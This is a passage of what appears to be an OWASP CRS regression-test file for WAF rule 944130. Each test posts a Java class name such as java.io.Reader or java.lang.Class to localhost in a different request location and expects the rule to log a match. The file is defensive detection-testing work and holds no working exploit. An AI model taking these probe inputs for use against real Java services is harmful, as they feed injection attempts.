80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PrintStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-229 + desc: "Content-Type text/plain includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.PrintStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-230 + desc: "Content-Type application/json arg value includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.PrintStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-231 + desc: "Content-Type application/json arg name includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.PrintStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-232 + desc: "Argument test includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.PushbackInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-233 + desc: "Argument name includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PushbackInputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-234 + desc: "Cookie test includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.PushbackInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-235 + desc: "Cookie name includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.PushbackInputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-236 + desc: "Request header test includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.PushbackInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-237 + desc: "XML attribute value includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-238 + desc: "XML element value includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PushbackInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-239 + desc: "Nested XML element value includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PushbackInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-240 + desc: "Content-Type text/plain includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.PushbackInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-241 + desc: "Content-Type application/json arg value includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.PushbackInputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-242 + desc: "Content-Type application/json arg name includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.PushbackInputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-243 + desc: "Argument test includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.Reader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-244 + desc: "Argument name includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.Reader=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-245 + desc: "Cookie test includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.Reader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-246 + desc: "Cookie name includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.Reader=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-247 + desc: "Request header test includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.Reader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-248 + desc: "XML attribute value includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-249 + desc: "XML element value includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.Reader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-250 + desc: "Nested XML element value includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.Reader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-251 + desc: "Content-Type text/plain includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.Reader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-252 + desc: "Content-Type application/json arg value includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.Reader\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-253 + desc: "Content-Type application/json arg name includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.Reader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-254 + desc: "Argument test includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.StringReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-255 + desc: "Argument name includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.StringReader=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-256 + desc: "Cookie test includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.StringReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-257 + desc: "Cookie name includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.StringReader=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-258 + desc: "Request header test includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.StringReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-259 + desc: "XML attribute value includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-260 + desc: "XML element value includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.StringReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-261 + desc: "Nested XML element value includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.StringReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-262 + desc: "Content-Type text/plain includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.StringReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-263 + desc: "Content-Type application/json arg value includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.StringReader\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-264 + desc: "Content-Type application/json arg name includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.StringReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-265 + desc: "Argument test includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Class" + output: + log_contains: "id \"944130\"" + - test_title: 944130-266 + desc: "Argument name includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Class=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-267 + desc: "Cookie test includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Class + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-268 + desc: "Cookie name includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Class=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-269 + desc: "Request header test includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Class + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-270 + desc: "XML attribute value includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-271 + desc: "XML element value includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Class" + output: + log_contains: "id \"944130\"" + - test_title: 944130-272 + desc: "Nested XML element value includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Class" + output: + log_contains: "id \"944130\"" + - test_title: 944130-273 + desc: "Content-Type text/plain includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Class" + output: + log_contains: "id \"944130\"" + - test_title: 944130-274 + desc: "Content-Type application/json arg value includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Class\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-275 + desc: "Content-Type application/json arg name includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.Class\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-276 + desc: "Argument test includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Integer" + output: + log_contains: "id \"944130\"" + - test_title: 944130-277 + desc: "Argument name includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Integer=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-278 + desc: "Cookie test includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Integer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-279 + desc: "Cookie name includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Integer=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-280 + desc: "Request header test includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Integer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-281 + desc: "XML attribute value includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-282 + desc: "XML element value includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: 